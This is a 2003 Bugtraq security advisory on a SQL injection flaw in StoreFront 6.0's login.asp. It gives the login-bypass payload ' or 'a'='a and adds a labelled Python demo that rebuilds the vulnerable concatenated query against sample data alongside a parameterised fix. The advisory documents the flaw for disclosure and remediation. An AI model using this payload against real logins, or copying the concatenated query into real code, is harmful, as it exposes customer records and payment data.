Message-ID: <20030712135646.21901.qmail@www.securityfocus.com>
Date: 12 Jul 2003 13:56:46 -0000
From: G00db0y <G00db0y@...e-h.org>
To: bugtraq@...urityfocus.com
Subject: ZH2003-3SA (security advisory): Storefront sql injection: users info disclosure

ZH2003-3SA (security advisory): Storefront sql injection: users info disclosure
Published: 12/07/2003

Released: 12/07/2003

Name: Storefront sql injection: users info disclosure

Affected Systems: StoreFront 6.0 (and older versions?)

Issue: Remote attackers can obtain users info

Author: G00db0y@...e-h.org

Description

***********

Zone-h Security Team has discovered a serious security flaw in StoreFront 6.0 (and older versions?). "Storefront offers merchants and developers a feature rich, fully customizable e-commerce solution at a fraction of the cost to deploy and maintain."

Details

*******

Storefront is an ASP shopping cart / storefront system that covers the needs of e-commerce web sites.

It is possible to retrieve sensitive user information. There is a SQL injection vulnerability in /login.asp of the StoreFront system: the login form fields are placed unfiltered into the SQL query, so a single quote in either field breaks out of the string literal and the rest of the input becomes part of the WHERE clause. Logging in with the following string as the e-mail ID and password:
' or 'a'='a

gives access to the first user in the database. If an attacker knows the e-mail address of any registered user, he can retrieve that registered user's information from the same login page by supplying that address as the e-mail ID and the string above as the password.

Example: 

Email of registered user: example@...mple.com

Email id (user in the login.asp): example@...mple.com
Password: ' or 'a'='a

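The following is an added example, not part of the original advisory and not StoreFront's code. It reproduces the two behaviours described above against a constructed in-memory table: the query shape (password test first, then e-mail, both glued in as string literals) and the column names are assumptions chosen because they produce exactly the results the advisory reports; the original login.asp query is not shown on this page. The parameterised version beside it is the standard fix.

```python
import sqlite3

# Constructed sample rows (not real StoreFront data). Plain-text passwords are
# kept only so the injected WHERE clause can be shown doing its work.
USERS = [
    (1, "alice@example.test", "s3cret-alice", "Alice Example", "4111 1111 1111 1111"),
    (2, "bob@example.test",   "s3cret-bob",   "Bob Example",   "5500 0000 0000 0004"),
]

PAYLOAD = "' or 'a'='a"   # the exact string given in the advisory


def make_db():
    """Build an in-memory SQLite table standing in for the shop's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, "
                 "password TEXT, name TEXT, card TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", USERS)
    return conn


def vulnerable_login_sql(email, password):
    """Hypothetical reconstruction of a classic-ASP style login query that
    concatenates the form fields straight into the SQL text.

    Because SQL evaluates AND before OR, the payload in the password field
    turns the clause into:  password='' OR ('a'='a' AND email='<email>')
    which is satisfied by every row whose e-mail matches, regardless of
    password. With the payload in both fields the trailing OR 'a'='a' makes
    the clause true for every row, so the first user comes back.
    """
    return ("SELECT id, email, name, card FROM users "
            f"WHERE password='{password}' AND email='{email}'")


def login_vulnerable(conn, email, password):
    """Run the concatenated query; returns the first matching row or None."""
    return conn.execute(vulnerable_login_sql(email, password)).fetchone()


def login_fixed(conn, email, password):
    """Same lookup with bound parameters: the quote in the payload is data,
    not SQL, so no WHERE-clause rewriting is possible."""
    return conn.execute(
        "SELECT id, email, name, card FROM users WHERE password=? AND email=?",
        (password, email),
    ).fetchone()


def demo():
    """Exercise both forms; returns a dict of the rows each call produced."""
    conn = make_db()
    return {
        "first_user":  login_vulnerable(conn, PAYLOAD, PAYLOAD),           # alice
        "known_email": login_vulnerable(conn, "bob@example.test", PAYLOAD),  # bob
        "fixed_first": login_fixed(conn, PAYLOAD, PAYLOAD),                # None
        "fixed_known": login_fixed(conn, "bob@example.test", PAYLOAD),     # None
        "legit":       login_fixed(conn, "bob@example.test", "s3cret-bob"),  # bob
    }


if __name__ == "__main__":
    for label, row in demo().items():
        print(f"{label:12s} -> {row}")
```

Run it and the two vulnerable calls return Alice's and Bob's records respectively, including the card column, while the parameterised calls only succeed with Bob's real password. Escaping the single quote would close this particular payload but not the general problem; binding parameters (an ADODB.Command with Parameters in classic ASP) is the remedy.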

Solution:

*********

The vendor has been contacted; no patch has been released yet.


Suggestions:

************

Nothing

G00db0y - www.zone-h.org admin

Original advisory here: http://www.zone-h.org/en/advisories/read/id=2684/

